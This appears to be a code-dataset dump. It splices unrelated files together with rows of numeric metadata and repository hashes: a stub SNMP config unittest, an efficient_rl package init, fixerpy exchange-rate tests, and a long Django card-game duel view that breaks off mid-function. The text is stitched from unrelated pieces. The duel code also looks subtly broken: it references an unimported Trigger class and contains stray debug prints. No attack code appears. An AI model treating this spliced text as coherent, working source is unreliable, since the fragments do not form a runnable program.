        self.assertEqual(self.config.agent_cache_directory(agent_id), expected)
class TestBasicFunctions(unittest.TestCase):
    """Checks all ConfigSNMP methods."""

    def test__validate_snmp(self):
        """Testing function _validate_snmp."""
        # Placeholder: no assertions implemented yet.
        pass

    def test__validate_oids(self):
        """Testing function _validate_oids."""
        # Placeholder: no assertions implemented yet.
        pass
if __name__ == '__main__':
    # Make sure the environment is OK to run unittests — presumably this
    # writes the config files the Config classes read; confirm in
    # tests/libraries/configuration.py
    UnittestConfig().create()
    # Do the unit test
    unittest.main()
| 35.027273
| 80
| 0.63483
| 1,754
| 15,412
| 5.375143
| 0.110604
| 0.101824
| 0.054306
| 0.059398
| 0.839945
| 0.839945
| 0.832732
| 0.832732
| 0.823186
| 0.793063
| 0
| 0.019905
| 0.233974
| 15,412
| 439
| 81
| 35.107062
| 0.778672
| 0.249546
| 0
| 0.792793
| 0
| 0.018018
| 0.067135
| 0.022009
| 0
| 0
| 0
| 0
| 0.288288
| 1
| 0.189189
| false
| 0.036036
| 0.031532
| 0
| 0.243243
| 0.004505
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
224cfd0e336da84f7f64cdb4e13747d8209ac826
| 379
|
py
|
Python
|
efficient_rl/agents/__init__.py
|
rlagywjd802/efficient_rl
|
6a82bfc10d814f5d36a7c211d645aa35ea380acf
|
[
"MIT"
] | 8
|
2020-06-25T10:16:48.000Z
|
2022-02-15T09:12:04.000Z
|
efficient_rl/agents/__init__.py
|
rlagywjd802/efficient_rl
|
6a82bfc10d814f5d36a7c211d645aa35ea380acf
|
[
"MIT"
] | null | null | null |
efficient_rl/agents/__init__.py
|
rlagywjd802/efficient_rl
|
6a82bfc10d814f5d36a7c211d645aa35ea380acf
|
[
"MIT"
] | 2
|
2020-12-30T07:39:38.000Z
|
2021-04-12T14:57:13.000Z
|
import efficient_rl.agents.oo_mdp_learner
from efficient_rl.agents.BaseAgentClass import BaseAgent
from efficient_rl.agents.RmaxBaseClass import RmaxBaseAgent
from efficient_rl.agents.RmaxClass import Rmax
from efficient_rl.agents.FactoredRmaxClass import FactoredRmax
from efficient_rl.agents.QLearningClass import QLearning
from efficient_rl.agents.DOORmaxClass import DOORmax
| 47.375
| 62
| 0.894459
| 49
| 379
| 6.734694
| 0.408163
| 0.233333
| 0.360606
| 0.381818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068602
| 379
| 7
| 63
| 54.142857
| 0.934844
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
225d26ce6baf557171c3543011dd8766d9262d5e
| 2,303
|
py
|
Python
|
tests.py
|
rudimk/fixerpy
|
59cd9c93981cf4d4320f4256fe789147dfff66b4
|
[
"Apache-2.0"
] | null | null | null |
tests.py
|
rudimk/fixerpy
|
59cd9c93981cf4d4320f4256fe789147dfff66b4
|
[
"Apache-2.0"
] | 1
|
2017-08-26T12:45:07.000Z
|
2017-08-26T13:38:18.000Z
|
tests.py
|
rudimk/fixerpy
|
59cd9c93981cf4d4320f4256fe789147dfff66b4
|
[
"Apache-2.0"
] | null | null | null |
from fixerpy import Converter
def testLatestRates():
    """Check the latest-rates payload with the default (EUR) base.

    Fetches the current rates and asserts the response is non-empty,
    carries a date, uses EUR as the base currency, and includes the
    exchange-rate table.
    """
    c = Converter()
    latestRates = c.getLatestRates()
    # `assert X, msg` replaces the verbose `if X: assert True
    # else: assert False, msg` blocks — identical pass/fail behavior.
    assert latestRates, "Current forex rates not retrieved."
    assert 'date' in latestRates, "The date is missing."
    assert latestRates['base'] == 'EUR', "The base rate is not EUR."
    assert 'rates' in latestRates, "The exchange rates are missing."
def testLatestRatesWithBase():
    """Check the latest-rates payload with an explicit USD base.

    Fetches the current rates with ``baseCurrency='USD'`` and asserts
    the response is non-empty, carries a date, uses USD as the base
    currency, and includes the exchange-rate table.
    """
    c = Converter(baseCurrency='USD')
    latestRates = c.getLatestRates()
    # `assert X, msg` replaces the verbose `if X: assert True
    # else: assert False, msg` blocks — identical pass/fail behavior.
    assert latestRates, "Current forex rates not retrieved."
    assert 'date' in latestRates, "The date is missing."
    assert latestRates['base'] == 'USD', "The base rate isn't USD."
    assert 'rates' in latestRates, "The exchange rates are missing."
def testHistoricalRates():
    """Check the historical-rates payload with the default (EUR) base.

    Fetches rates for 2017-01-01 and asserts the response is non-empty,
    carries a date, uses EUR as the base currency, and includes the
    exchange-rate table.
    """
    c = Converter(queryDate='2017-01-01')
    historicalRates = c.getHistoricalRates()
    # `assert X, msg` replaces the verbose `if X: assert True
    # else: assert False, msg` blocks — identical pass/fail behavior.
    assert historicalRates, "Historical forex rates not retrieved."
    assert 'date' in historicalRates, "The date is missing."
    assert historicalRates['base'] == 'EUR', "The base rate is not EUR."
    assert 'rates' in historicalRates, "The exchange rates are missing."
def testHistoricalRatesWithBase():
    """Check the historical-rates payload with an explicit USD base.

    Fetches rates for 2017-01-01 with ``baseCurrency='USD'`` and asserts
    the response is non-empty, carries a date, uses USD as the base
    currency, and includes the exchange-rate table.
    """
    c = Converter(queryDate='2017-01-01', baseCurrency='USD')
    historicalRates = c.getHistoricalRates()
    # `assert X, msg` replaces the verbose `if X: assert True
    # else: assert False, msg` blocks — identical pass/fail behavior.
    assert historicalRates, "Historical forex rates not retrieved."
    assert 'date' in historicalRates, "The date is missing."
    assert historicalRates['base'] == 'USD', "The base rate isn't USD."
    assert 'rates' in historicalRates, "The exchange rates are missing."
| 28.432099
| 61
| 0.620929
| 260
| 2,303
| 5.5
| 0.161538
| 0.111888
| 0.156643
| 0.223776
| 0.886014
| 0.886014
| 0.848252
| 0.848252
| 0.848252
| 0.848252
| 0
| 0.009798
| 0.290925
| 2,303
| 81
| 62
| 28.432099
| 0.865891
| 0
| 0
| 0.831169
| 0
| 0
| 0.231771
| 0
| 0
| 0
| 0
| 0
| 0.415584
| 1
| 0.051948
| false
| 0
| 0.012987
| 0
| 0.064935
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
58c004f50cde44fb8358ca6d7b1f2d52b5e7022b
| 65,222
|
py
|
Python
|
mysite/tcgcreator/battle_det.py
|
jidpn/tcgcreator_eternal_beta
|
4a10a5a36eeb161cf35a3488453c00325d78ae83
|
[
"MIT"
] | null | null | null |
mysite/tcgcreator/battle_det.py
|
jidpn/tcgcreator_eternal_beta
|
4a10a5a36eeb161cf35a3488453c00325d78ae83
|
[
"MIT"
] | null | null | null |
mysite/tcgcreator/battle_det.py
|
jidpn/tcgcreator_eternal_beta
|
4a10a5a36eeb161cf35a3488453c00325d78ae83
|
[
"MIT"
] | null | null | null |
from .models import (
Deck,
Duel,
Grave,
Hand,
CostWrapper,
Config,
Lock,
)
from html import escape
from django.http import HttpResponse
from django.utils.html import format_html
from django.db.models import Q
from .duel import DuelObj
from django.db import connection
import json
import copy
from time import time
from pprint import pprint
from .battle_functions import init_duel
def send_message(request):
    """Append a chat message to a duel's logs and return the updated logs.

    Args:
        request: Django HTTP request. POST must carry ``room_number`` and
            ``message``; an optional ``ID`` cookie identifies guest players.

    Returns:
        HttpResponse: JSON with the updated ``log``, ``message_log`` and
        ``current_log`` strings, or the plain string ``"error"`` when the
        requester is not one of the room's two players.
    """
    room_number = int(request.POST["room_number"])
    duel = Duel.objects.get(id=room_number)
    duelobj = DuelObj(room_number)
    duelobj.duel = duel
    duelobj.room_number = room_number
    duelobj.in_execute = False
    user_1 = None
    user_2 = None
    # Guests are identified by the "ID" cookie rather than request.user.
    if "ID" in request.COOKIES:
        ID = request.COOKIES["ID"]
    else:
        ID = ""
    # For each seat, use either the registered user or the guest ID.
    # "-1" is a sentinel that can never match a real cookie value.
    if duel.guest_flag == False:
        user_1 = duel.user_1
        ID1 = "-1"
    else:
        ID1 = duel.guest_id
    if duel.guest_flag2 == False:
        user_2 = duel.user_2
        ID2 = "-1"
    else:
        ID2 = duel.guest_id2
    # Reject anyone who is neither a registered player nor a known guest.
    if request.user != user_1 and request.user != user_2:
        if (ID1 == ID and duel.guest_flag) or (ID2 == ID and duel.guest_flag2):
            pass
        else:
            return HttpResponse("error")
    user = None
    if request.user == user_1 or (ID1 == ID and duel.guest_flag is True):
        duelobj.user = 1
        user = 1
    if request.user == user_2 or (ID2 == ID and duel.guest_flag2 is True):
        duelobj.user = 2
        user = 2
    if user is None:
        # Defensive: previously an unmatched requester that slipped past
        # the guard above raised UnboundLocalError on `user` below.
        return HttpResponse("error")
    # Prefix the message with the sender's display name.
    if user == 1:
        if duel.guest_flag is False:
            tmp = user_1.first_name + ":「" + request.POST["message"] + "」\n"
        else:
            tmp = duel.guest_name + ":「" + request.POST["message"] + "」\n"
    else:
        if duel.guest_flag2 is False:
            tmp = user_2.first_name + ":「" + request.POST["message"] + "」\n"
        else:
            tmp = duel.guest_name2 + ":「" + request.POST["message"] + "」\n"
    tmp = format_html(escape(tmp))
    log_turn = duel.log_turn + tmp
    log = duel.log + tmp
    message_log = escape(duel.message_log) + tmp
    current_log = escape(duel.current_log) + tmp
    # Use a parameterized query. The previous string-concatenated SQL was
    # vulnerable to SQL injection (and broke on quotes) because the
    # user-supplied chat message was spliced directly into the statement.
    cursor = connection.cursor()
    cursor.execute(
        "update tcgcreator_duel set log_turn = %s, log = %s,"
        " current_log = %s, message_log = %s where id = %s",
        [log_turn, log, current_log, message_log, room_number],
    )
    return_value = {}
    return_value["log"] = log_turn
    return_value["message_log"] = message_log
    return_value["current_log"] = current_log
    return HttpResponse(json.dumps(return_value))
def battle_det(request, duelobj=None, choices=None):
room_number = int(request.POST["room_number"])
lock = Lock.objects.get()
if duelobj is None:
duel = Duel.objects.get(id=room_number)
duelobj = DuelObj(room_number)
duelobj.duel = duel
duelobj.room_number = room_number
duelobj.in_execute = False
tmp_flag = True
else:
duel = duelobj.duel
tmp_flag = False
if "ID" in request.COOKIES :
ID = request.COOKIES["ID"]
else:
ID = ""
ID1 = duel.guest_id
ID2 = duel.guest_id2
user_1 = duel.user_1
user_2 = duel.user_2
if (user_1 is not None and request.user == user_1) or (ID1 == ID and duel.guest_flag):
user = 1
other_user = 2
elif (user_2 is not None and request.user == user_2) or (ID2 == ID and duel.guest_flag2):
user = 2
other_user = 1
else:
return HttpResponse("error")
if duel.winner == 0:
if user == 1:
if duel.guest_flag is True and duel.guest_name == "":
return HttpResponse("choose_name")
if duel.deck_choose_flag1 is True and duel.is_ai is False:
return HttpResponse("choosing_deck")
if duel.is_ai is False and duel.deck_choose_flag2 is True or (duel.guest_flag2 is True and duel.guest_name2 == ""):
config = Config.objects.get();
limit_time = config.limit_time
if time() - duel.time_2 > limit_time:
duelobj.win_the_game()
return HttpResponse("true")
return HttpResponse("waiting_choosing_deck")
if user == 2:
if duel.guest_flag2 is True and duel.guest_name2== "":
return HttpResponse("choose_name")
if duel.deck_choose_flag2 is True:
return HttpResponse("choosing_deck")
if duel.deck_choose_flag1 is True or (duel.guest_flag is True and duel.guest_name == ""):
config = Config.objects.get();
limit_time = config.limit_time
if time() - duel.time_1 > limit_time:
duelobj.win_the_game()
return HttpResponse("true")
return HttpResponse("waiting_choosing_deck")
if "wait_ai" in request.POST:
if duel.user_turn == 2 and duel.ask == 0:
decks = Deck.objects.all()
graves = Grave.objects.all()
hands = Hand.objects.all()
duelobj.user = 1
duelobj.other_user = 2
duelobj.init_all(1,2, room_number)
return battle_det_return_org_ai(
duelobj, decks, graves, hands, 1, 2, choices, room_number
)
else:
return HttpResponse("waiting")
# 相手番でも一回は様子をみる
if room_number == 1:
if lock.lock_1 is True and time() - lock.time_1 < 20:
if duel.is_ai == False or not "wait_ai" in request.POST or duel.user_turn == 1 or duel.ask != 0:
return HttpResponse("waiting")
else:
decks = Deck.objects.all()
graves = Grave.objects.all()
hands = Hand.objects.all()
user_1 = duel.user_1
user_2 = duel.user_2
if request.user != user_1 and request.user != user_2 and ID1 != ID and ID2 != ID:
if (ID1 == ID and duel.guest_flag) or (ID2 == ID and duel.guest_flag2):
pass
else:
return HttpResponse("error")
if request.user == user_1 or (ID1 == ID and duel.guest_flag):
duelobj.user = 1
user = 1
other_user = 2
if request.user == user_2 or (ID2 == ID and duel.guest_flag2):
duelobj.user = 2
user = 2
other_user = 1
duelobj.init_all(user, other_user, room_number)
return battle_det_return_org_ai(
duelobj, decks, graves, hands, user, other_user, choices, room_number
)
else:
lock.lock_1 = True
lock.time_1 = time();
lock.save()
elif room_number == 2:
if lock.lock_2 is True and time() - lock.time_2 < 20:
if duel.is_ai == False or not "wait_ai" in request.POST or duel.user_turn == 1 or duel.ask != 0:
return HttpResponse("waiting")
else:
decks = Deck.objects.all()
graves = Grave.objects.all()
hands = Hand.objects.all()
user_1 = duel.user_1
user_2 = duel.user_2
if request.user != user_1 and request.user != user_2 and ID1 != ID and ID2 != ID:
if (ID1 == ID and duel.guest_flag) or (ID2 == ID and duel.guest_flag2):
pass
else:
return HttpResponse("error")
if request.user == user_1 or (ID1 == ID and duel.guest_flag):
duelobj.user = 1
user = 1
other_user = 2
if request.user == user_2 or (ID2 == ID and duel.guest_flag2):
duelobj.user = 2
user = 2
other_user = 1
duelobj.init_all(user, other_user, room_number)
return battle_det_return_org_ai(
duelobj, decks, graves, hands, user, other_user, choices, room_number
)
else:
lock.lock_2 = True
lock.time_2 = time();
lock.save()
elif room_number == 3:
if lock.lock_3 is True and time() - lock.time_3 < 20:
if duel.is_ai == False or not "wait_ai" in request.POST or duel.user_turn == 1 or duel.ask != 0:
return HttpResponse("waiting")
else:
decks = Deck.objects.all()
graves = Grave.objects.all()
hands = Hand.objects.all()
user_1 = duel.user_1
user_2 = duel.user_2
if request.user != user_1 and request.user != user_2 and ID1 != ID and ID2 != ID:
if (ID1 == ID and duel.guest_flag) or (ID2 == ID and duel.guest_flag2):
pass
else:
return HttpResponse("error")
if request.user == user_1 or (ID1 == ID and duel.guest_flag):
duelobj.user = 1
user = 1
other_user = 2
if request.user == user_2 or (ID2 == ID and duel.guest_flag2):
duelobj.user = 2
user = 2
other_user = 1
duelobj.init_all(user, other_user, room_number)
return battle_det_return_org_ai(
duelobj, decks, graves, hands, user, other_user, choices, room_number
)
else:
lock.lock_3 = True
lock.time_3 = time();
lock.save()
user_1 = duel.user_1
user_2 = duel.user_2
if request.user != user_1 and request.user != user_2 and ID1 != ID and ID2 != ID:
if (ID1 == ID and duel.guest_flag) or (ID2 == ID and duel.guest_flag2):
pass
else:
return HttpResponse("error")
if request.user == user_1 or (ID1 == ID and duel.guest_flag):
duelobj.user = 1
user = 1
other_user = 2
if request.user == user_2 or (ID2 == ID and duel.guest_flag2):
duelobj.user = 2
user = 2
other_user = 1
if tmp_flag is True:
duelobj.init_all(user, other_user, room_number)
decks = Deck.objects.all()
graves = Grave.objects.all()
hands = Hand.objects.all()
turn = duel.user_turn
duelobj.update = False
# chain_user = duelobj.get_current_chain_user()
if choices is None:
choices = []
choices.append(None)
choices.append(10000)
if duel.winner != 0:
if room_number == 1:
lock.lock_1 = False
lock.save()
elif room_number == 2:
lock.lock_2 = False
lock.save()
elif room_number == 3:
lock.lock_3 = False
lock.save()
return battle_det_return_org(
duelobj, decks, graves, hands, user, other_user, choices, room_number
)
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
choices = duelobj.check_trigger(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
choices2 = duelobj.check_trigger(
decks, graves, hands, duel.phase, duel.user_turn, other_user, user
)
if (
duel.is_ai == False
and duel.appoint != user
and ((choices2[0] is not None and duelobj.check_wait(other_user)) or duel.ask > 0)
and ((turn == user and duel.ask != 2) or (turn != user and duel.ask == 2))
and duel.ask != 3
):
if room_number == 1:
lock.lock_1 = False
lock.save()
elif room_number == 2:
lock.lock_2 = False
lock.save()
elif room_number == 3:
lock.lock_3 = False
lock.save()
return battle_det_return(
duelobj, decks, graves, hands, user, other_user, choices, room_number
)
if (
duel.appoint == user
and duel.ask > 0
and ((turn == user and duel.ask == 2) or (turn != user and duel.ask == 1))
):
if room_number == 1:
lock.lock_1 = False
lock.save()
elif room_number == 2:
lock.lock_2 = False
lock.save()
elif room_number == 3:
lock.lock_3 = False
lock.save()
return battle_det_return(
duelobj, decks, graves, hands, user, other_user, choices, room_number
)
trigger_waiting = json.loads(duel.trigger_waiting)
if duel.in_trigger_waiting is True:
flag = False
else:
flag = True
if (
(duel.chain == 0 or duel.in_trigger_waiting is True)
and duel.trigger_waiting != "[]"
and duel.in_cost is False
and duel.ask == 0
):
if choices2[0] == None and choices[0] == None:
tmp_priority = min(choices[1],choices2[1])
elif choices2[0] == None:
tmp_priority = choices[1]
elif choices[0] == None:
tmp_priority = choices2[1]
else:
tmp_priority = duelobj.max2(choices,choices2)
duelobj.invoke_trigger_waiting(duel.trigger_waiting, tmp_priority)
duelobj.update = True
flag = True
flag_3 = False
ai_flag = False
while flag is True and (duel.winner == 0 and duel.winner_ai == 0):
flag = False
lll_flag = False
if duel.in_cost >= 1 and duelobj.in_execute is False and duel.appoint == user:
cost = CostWrapper.objects.get(id=duel.cost_det)
trigger = Trigger.objects.get(id=duel.current_trigger)
duelobj.pay_cost(cost, user,duel.chain,trigger,False)
duelobj.update = True
elif duel.in_cost is False:
choices = duelobj.check_trigger(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
while duel.winner == 0 and duel.winner_ai == 0:
if flag_3 is True:
break
flag_2 = False
if (choices[1] < choices2[1]) or (choices[0] is None and choices2[0] is not None):
duel.appoint = other_user
if duel.appoint == other_user:
while duel.winner == 0 and duel.winner_ai == 0:
choices2 = duelobj.check_trigger(
decks,
graves,
hands,
duel.phase,
duel.user_turn,
other_user,
user,
)
if duel.appoint == user:
break
if choices2[0] is not None and duelobj.check_wait(other_user) and duel.is_ai == False:
flag_2 = True
break
else:
choices = duelobj.check_trigger(
decks,
graves,
hands,
duel.phase,
duel.user_turn,
user,
other_user,
)
if choices[0] is not None and duelobj.check_wait(user):
#duel.current_priority = duelobj.max2(choices,choices2)
duelobj.update = True
if duel.none == False:
if duel.appoint == 1:
duel.appoint = 2
else:
duel.appoint = 1
duel.none = True
else:
duel.current_priority = duelobj.max2(choices,choices2)
duelobj.update = True
if duel.appoint == 1:
duel.appoint = 2
else:
duel.appoint = 1
duel.none = False
elif choices2[0] is not None and duelobj.check_wait(other_user) and duel.is_ai is False:
if ai_flag is False:
duel.current_priority = duelobj.max2(choices,choices2)
ai_flag = False
duelobj.update = True
if duel.none == False:
if duel.appoint == 1:
duel.appoint = 2
else:
duel.appoint = 1
duel.none = True
else:
duel.current_priority = duelobj.max2(choices,choices2)
duelobj.update = True
if duel.appoint == 1:
duel.appoint = 2
else:
duel.appoint = 1
duel.none = False
break
elif lll_flag is False:
lll_flag = True
else:
lll_flag = False
tmp_current_priority = duel.current_priority
duel.current_priority = duelobj.max2(choices,choices2)
if tmp_current_priority != duel.current_priority:
duelobj.update = True
if duel.current_priority == 0 and duel.in_trigger_waiting == 1 and duel.ask == 0 and duel.in_cost is False :
duelobj.invoke_trigger_waiting(duel.trigger_waiting)
if duel.in_cost is False:
if duel.is_ai == True:
ai_flag = True
duelobj.retrieve_chain(
decks,
graves,
hands,
duel.phase,
duel.user_turn,
user,
other_user,
)
if duel.chain == 0:
duelobj.invoke_after_chain_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
if duel.chain == 0:
duel.current_priority = 10000
if duel.timing3 is not None and duel.chain == 0:
if duel.timing3.timing_auto is True:
if duel.timing_fresh is False:
duel.timing3 = duel.timing3.next_timing
duel.timing_fresh = True
else:
duel.timing_fresh = False
if duel.timing is None and duel.timing2 is None and duel.timing3 is None:
duelobj.timing_mess = {}
if duel.mute == 1:
duelobj.unmute()
duel.mute = 0
elif duel.timing2 is not None and duel.chain == 0:
if duel.timing2.timing_auto is True:
if duel.timing_fresh is False:
duel.timing2 = duel.timing2.next_timing
duel.timing_fresh = True
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
else:
duel.timing_fresh = False
if duel.timing is None and duel.timing2 is None:
duelobj.timing_mess = {}
if duel.mute == 1:
duelobj.unmute()
duel.mute = 0
elif duel.timing is not None and duel.chain == 0:
if duel.timing.timing_auto is True:
if duel.timing_fresh is False:
duel.timing = duel.timing.next_timing
duel.timing_fresh = True
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
else:
duel.timing_fresh = False
if duel.timing is None:
duelobj.timing_mess = {}
if duel.mute == 1:
duelobj.unmute()
duel.mute = 0
duel.appoint = duel.user_turn
tmp = {}
duel.mess = json.dumps(tmp)
duel.cost_result = json.dumps(tmp)
duel.cost = json.dumps(tmp)
if duel.appoint == other_user and duel.is_ai == False:
flag_2 = True
break
elif duel.current_priority == 0 and duel.in_cost is False :
if (duel.ask == 0 ):
duelobj.invoke_trigger_waiting(duel.trigger_waiting)
pprint("BBB")
pprint(duel.chain)
duel.current_priority = 10000
if duel.chain != 0:
duelobj.retrieve_chain(
decks,
graves,
hands,
duel.phase,
duel.user_turn,
user,
other_user,
)
pprint(duel.chain)
if duel.chain == 0:
duelobj.invoke_after_chain_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
else:
duel.timing_fresh = False
if duel.chain == 0:
pprint("CCC")
duel.current_priority = 10000
if duel.timing3 is not None and duel.chain == 0:
if duel.timing3.timing_auto is True:
if duel.timing_fresh is False:
duel.timing3 = duel.timing3.next_timing
duel.timing_fresh = True
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
else:
duel.timing_fresh = False
if duel.timing is None and duel.timing2 is None and duel.timing3 is None:
duelobj.timing_mess = {}
if duel.mute == 1:
duelobj.unmute()
if duel.timing2 is not None and duel.chain == 0:
if duel.timing2.timing_auto is True:
if duel.timing_fresh is False:
duel.timing2 = duel.timing2.next_timing
duel.timing_fresh = True
else:
duel.timing_fresh = False
if duel.timing is None and duel.timing2 is None:
duelobj.timing_mess = {}
if duel.mute == 1:
duelobj.unmute()
elif duel.timing is not None and duel.chain == 0:
if duel.timing.timing_auto is True:
if duel.timing_fresh is False:
duel.timing = duel.timing.next_timing
duel.timing_fresh = True
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
else:
duel.timing_fresh = False
if duel.timing is None:
duelobj.timing_mess = {}
if duel.mute == 1:
duelobj.unmute()
duel.mute = 0
tmp = {}
duel.mess = json.dumps(tmp)
duel.cost_result = json.dumps(tmp)
duel.cost = json.dumps(tmp)
duel.appoint = duel.user_turn
if duel.appoint == other_user and duelobj.check_wait(other_user) and duel.is_ai == False:
flag_2 = True
break
if duel.appoint == user:
choices = duelobj.check_trigger(
decks,
graves,
hands,
duel.phase,
duel.user_turn,
user,
other_user,
)
choices2 = duelobj.check_trigger(
decks,
graves,
hands,
duel.phase,
duel.user_turn,
other_user,
user,
)
if (choices2[1] > choices[1] and choices2[1] is not None) or (
choices2[0] is not None and choices[0] is None
):
if not duelobj.check_wait(other_user) or duel.is_ai is True:
duel.current_priority = choices2[1]
duelobj.update = True
elif duel.none == False:
if duel.appoint == 1:
duel.appoint = 2
else:
duel.appoint = 1
duel.none = True
break
else:
duel.current_priority = duelobj.max2(choices,choices2)
if duel.appoint == 1:
duel.appoint = 2
else:
duel.appoint = 1
duel.none = False
duelobj.update = True
break
if choices[0] != "monster_trigger":
if (
choices[0] is None and choices2[0] is not None
): # and duel.appoint == duel.user_turn):
duelobj.update = True
if not duelobj.check_wait(other_user):
duel.current_priority = choices2[1]
elif duel.none == False:
if duel.appoint == 1:
duel.appoint = 2
else:
duel.appoint = 1
duel.none = True
break
else:
duel.current_priority = duelobj.max2(choices,choices2)
if duel.appoint == 1:
duel.appoint = 2
else:
duel.appoint = 1
duel.none = False
elif (
choices[0] is None
and choices2[0] is not None
and duel.appoint != duel.user_turn
):
duel.current_priority = choices2[1]
duelobj.update = True
elif duel.in_cost is False and \
(duel.ask == 0 and (
(choices[0] is None or choices[0] is True)
and choices2[0] is None
and duel.appoint == duel.user_turn
and duel.chain == 0
and (duel.timing is not None or duel.timing2 is not None or duel.timing3 is not None)
and choices[1] == 0
) or (
choices[1] == 0
and choices2[1] == 0
and (duel.timing is not None or duel.timing2 is not None or duel.timing3 is not None)
)):
duelobj.invoke_trigger_waiting(duel.trigger_waiting)
if duel.in_cost is False:
duelobj.retrieve_chain(
decks,
graves,
hands,
duel.phase,
duel.user_turn,
user,
other_user,
)
if duel.chain == 0:
duelobj.invoke_after_chain_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
if duel.chain == 0:
duel.current_priority = choices[1]
if duel.timing3 is not None:
if duel.timing3.timing_auto is True:
if duel.timing_fresh is False:
duel.timing3 = duel.timing3.next_timing
duel.timing_fresh = True
else:
duel.timing_fresh = False
if duel.timing3 is None and duel.timing2 is None and duel.timing is None:
duelobj.timing_mess = {}
if duel.mute == 1:
duelobj.unmute()
duel.mute = 0
elif duel.timing2 is not None:
if duel.timing2.timing_auto is True:
if duel.timing_fresh is False:
duel.timing2 = duel.timing2.next_timing
duel.timing_fresh = True
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
else:
duel.timing_fresh = False
if duel.timing2 is None and duel.timing is None:
duelobj.timing_mess = {}
if duel.mute == 1:
duelobj.unmute()
duel.mute = 0
elif duel.timing is not None:
if duel.timing.timing_auto is True:
if duel.timing_fresh is False:
duel.timing = duel.timing.next_timing
duel.timing_fresh = True
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
else:
duel.timing_fresh = False
if duel.timing is None:
duelobj.timing_mess = {}
if duel.mute == 1:
duelobj.unmute()
duel.mute = 0
tmp = {}
duel.mess = json.dumps(tmp)
duel.cost_result = json.dumps(tmp)
duel.cost = json.dumps(tmp)
duel.appoint = duel.user_turn
duel.appoint = duel.user_turn
pprint("DDD")
duel.current_priority = 10000
duelobj.update = True
elif (
(choices[0] is None or choices[0] is True)
and (choices2[0] is None
or choices[0] is True) and duel.chain == 0 and duel.in_cost is False):
duel.current_priority = choices[1]
duelobj.update = True
if duel.current_priority == 0 and duel.ask == 0:
pprint("EEE")
duel.current_priority = 10000
duelobj.invoke_trigger_waiting(duel.trigger_waiting)
if duel.in_cost is False:
duelobj.retrieve_chain(
decks,
graves,
hands,
duel.phase,
duel.user_turn,
user,
other_user,
)
if duel.chain == 0:
duelobj.invoke_after_chain_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
duel.appoint = duel.user_turn
choices = duelobj.check_trigger(
decks,
graves,
hands,
duel.phase,
duel.user_turn,
user,
other_user,
)
if choices[0] is None:
break
elif (
choices[0] is None
and choices2[0] is None
and duel.chain != 0
and duel.ask == 0
and duel.in_trigger_waiting is True
):
if (
(duel.chain == 0 or duel.in_trigger_waiting is True)
and duel.trigger_waiting != "[]"
and duel.in_cost is False
and duel.ask == 0
):
duel.current_priority = duelobj.max2(choices,choices2)
if duel.current_priority == 0:
pprint("FFF")
duel.current_priority = 10000
choices = duelobj.check_trigger(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
choices2 = duelobj.check_trigger(
decks, graves, hands, duel.phase, duel.user_turn, other_user, user
)
flag2 = duelobj.invoke_trigger_waiting(duel.trigger_waiting, duel.current_priority)
duelobj.update = True
if not flag2:
duel.in_trigger_waiting = False
continue
break
if (
choices[0] is None
and choices2[0] is None
and duel.chain != 0
and duel.ask == 0
and duel.in_cost is False
and duel.in_trigger_waiting is False
):
duelobj.check_eternal_effect(
decks,
graves,
hands,
duel.phase,
duel.user_turn,
user,
other_user,
)
duelobj.invoke_trigger_waiting(duel.trigger_waiting)
duelobj.update = True
if duel.in_cost is False:
duelobj.retrieve_chain(
decks,
graves,
hands,
duel.phase,
duel.user_turn,
user,
other_user,
)
if duel.chain == 0:
duelobj.invoke_after_chain_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
if duel.chain == 0:
duel.appoint = duel.user_turn
if duel.timing3 is not None:
if duel.timing3.timing_auto is True:
if duel.timing_fresh is False:
duel.timing3 = duel.timing3.next_timing
duel.timing_fresh = True
else:
duel.timing_fresh = False
if duel.timing is None and duel.timing2 is None and duel.timing3 is None:
duelobj.timing_mess = {}
if duel.mute == 1:
duelobj.unmute()
